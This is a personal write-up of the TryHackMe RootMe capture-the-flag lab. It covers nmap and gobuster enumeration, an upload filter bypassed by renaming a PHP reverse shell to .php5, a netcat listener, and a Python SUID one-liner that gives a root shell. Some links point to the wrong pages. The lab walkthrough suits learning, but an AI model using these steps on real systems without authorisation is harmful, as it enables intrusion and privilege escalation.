# RootMe
This is my writeup for TryHackMe's CTF RootMe. 

## Enumeration 
I started with enumeration, more specifically I started with an nmap scan. For nmap, I found this script that helps streamline nmap ([nmapAutomator](https://github.com/21y4d/nmapAutomator)), so I'll be using that for my scan. 

I got the following output: 

     # Nmap 7.92 scan initiated Sun Nov 27 16:19:40 2022 as: nmap -Pn -sCV -p22,80 -oN nmap/Basic_10.10.157.151.nmap 10.10.157.151
    Nmap scan report for 10.10.157.151
    Host is up (0.14s latency).

    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
    |   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
    |_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    | http-cookie-flags: 
    |   /: 
    |     PHPSESSID: 
    |_      httponly flag not set
    |_http-title: HackIT - Home
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Sun Nov 27 16:19:54 2022 -- 1 IP address (1 host up) scanned in 14.43 seconds

## Checking out the web server
Looking at both of these ports I saw that one was a web server, while the other was SSH. I decided to first check out the webserver. 

![Webserver](/source/images/Screenshot 2022-11-27 at 16-30-18 HackIT - Home.png "Webserver")

However, after using the Inspect Element tool on the webpage, I couldn't find anything useful or noteworthy for a possible exploit. I also tried searching for a robots.txt file (in the address bar), but nothing came up. So I decided next to use Gobuster to find any possible hidden directories. 

## Gobuster
Using the following command: 

    gobuster dir -u http://10.10.157.151:80 -w /usr/share/wordlists/dirb/common.txt -o gobuster

I got the following output: 

    /.hta                 (Status: 403) [Size: 278]
    /.htaccess            (Status: 403) [Size: 278]
    /.htpasswd            (Status: 403) [Size: 278]
    /css                  (Status: 301) [Size: 312] [--> http://10.10.157.151/css/]
    /index.php            (Status: 200) [Size: 616]
    /js                   (Status: 301) [Size: 311] [--> http://10.10.157.151/js/]
    /panel                (Status: 301) [Size: 314] [--> http://10.10.157.151/panel/]
    /server-status        (Status: 403) [Size: 278]
    /uploads              (Status: 301) [Size: 316] [--> http://10.10.157.151/uploads/]

Looking at /panel shows a webpage where I can upload a file, this could be a possible [Unrestricted File Upload](https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload). /upload just shows the directory tree for the webserver, and /js just shows the code I found when using the Inspect Element tool. 

./hta, ./htaccess, ./htpasswd threw a forbidden access page. 

## Exploitation
### First Flag 
Focusing on /panel, I decided to find a form to upload that would give me a reverse shell. I know the webserver is running Apache 2.4.29, however I couldn't really find anything for Apache 2.4.29 on Metasploit and the [vulnerabilities](https://github.com/21y4d/nmapAutomator) I found for it (on Apache's website) were a bit confusing for me to make something meaningful out of. 

It was as this point I had to look for some help. I consulted a guide that discussed this walkthrough. The guide I followed talked about using a php reverse shell, which can be found on [pentestmonkey](https://github.com/21y4d/nmapAutomator). I edited the file so that it used the VPN's IP address, and also started a TCP listener with the following command: 

     nc -vnlp 1234

After this, I uploaded the reverse shell to the webpage under /panel, but was met with an error. My understanding of this is that PHP was recognized as a potential threat by the webpage, so it was prohibitted from being uploaded to the server. I circumvented this by changing the file extension to php5 and then uploaded. It worked this time; however, I am a bit curious as to how this would've worked with other file extensions, as well as what file extension would be considered the most inconspicuous; but that's a topic to research for another day. 

Next I went to the /uploads directory and selected the file I had just uploaded. It took a few clicks, not sure why, but I was able to then get a reverse shell into the webserver. The task asked for a user.txt, so I used the following command to find it: 

    find * -name user.txt

The output I got listed a bunch of directories, most of which stated Permission Denied. But there was one in particular that stood out: /var/WWW/user.txt (bingo!), I now had my first flag. 

### Second Flag
The hint given by this task, as well as the guide I referred back to, suggested finding a file with a specific SUID permission (in this case, root). So I ran the following command: 

    find / -user root -perm /4000 2>/dev/null 

And got the following output: 

    ./usr/lib/dbus-1.0/dbus-daemon-launch-helper
    ./usr/lib/snapd/snap-confine
    ./usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
    ./usr/lib/eject/dmcrypt-get-device
    ./usr/lib/openssh/ssh-keysign
    ./usr/lib/policykit-1/polkit-agent-helper-1
    ./usr/bin/traceroute6.iputils
    ./usr/bin/newuidmap
    ./usr/bin/newgidmap
    ./usr/bin/chsh
    ./usr/bin/python
    ./usr/bin/chfn
    ./usr/bin/gpasswd
    ./usr/bin/sudo
    ./usr/bin/newgrp
    ./usr/bin/passwd
    ./usr/bin/pkexec
    ./snap/core/8268/bin/mount
    ./snap/core/8268/bin/ping
    ./snap/core/8268/bin/ping6
    ./snap/core/8268/bin/su
    ./snap/core/8268/bin/umount
    ./snap/core/8268/usr/bin/chfn
    ./snap/core/8268/usr/bin/chsh
    ./snap/core/8268/usr/bin/gpasswd
    ./snap/core/8268/usr/bin/newgrp
    ./snap/core/8268/usr/bin/passwd
    ./snap/core/8268/usr/bin/sudo
    ./snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    ./snap/core/8268/usr/lib/openssh/ssh-keysign
    ./snap/core/8268/usr/lib/snapd/snap-confine
    ./snap/core/8268/usr/sbin/pppd
    ./snap/core/9665/bin/mount
    ./snap/core/9665/bin/ping
    ./snap/core/9665/bin/ping6
    ./snap/core/9665/bin/su
    ./snap/core/9665/bin/umount
    ./snap/core/9665/usr/bin/chfn
    ./snap/core/9665/usr/bin/chsh
    ./snap/core/9665/usr/bin/gpasswd
    ./snap/core/9665/usr/bin/newgrp
    ./snap/core/9665/usr/bin/passwd
    ./snap/core/9665/usr/bin/sudo
    ./snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    ./snap/core/9665/usr/lib/openssh/ssh-keysign
    ./snap/core/9665/usr/lib/snapd/snap-confine
    ./snap/core/9665/usr/sbin/pppd
    ./bin/mount
    ./bin/su
    ./bin/fusermount
    ./bin/ping
    ./bin/umount

It's worth noting that the 2>/dev/null portion of find gives all of the directories that don't have Permission Denied, this was something useful that I didn't know before. 

Of the following directories, /usr/bin/python looked strange since Python is not commonly found with perm 4000. Using [GTFOBins](https://gtfobins.github.io/) for assistance, we can use following command to exploit Python SUID:

     /usr/bin/./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'. 

From there I had root privileges. It was now simply a matter of traversing to the /root directory and using cat on the root.txt file; giving me the second flag. 
